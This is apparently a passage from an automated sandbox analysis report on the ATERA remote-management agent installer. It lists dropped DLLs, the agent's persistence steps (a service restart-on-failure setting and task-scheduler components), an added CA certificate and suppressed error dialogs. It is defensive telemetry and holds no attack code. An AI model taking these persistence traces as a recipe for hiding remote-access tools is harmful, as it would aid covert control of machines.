                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorrc.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore_amd64_amd64_6.0.3224.31407.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.HttpListener.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.DataAnnotations.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAC5.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorlib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.Lightweight.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clretwrc.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clrjit.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.DataContractSerialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9B15.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordbi.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI72FF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBEDF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.Windows.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Native.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.CodePages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.TypeExtensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Serialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 4c9999.rbf (copy)Jump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Loader.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Web.HttpUtility.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Quic.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\AteraSetupLog.txt
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files\dotnet\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt

                                Boot Survival

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                                Source: C:\Windows\System32\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBA524 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,37_2_00007FFB02EBA524
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Registry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                                Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess information set: NOGPFAULTERRORBOX
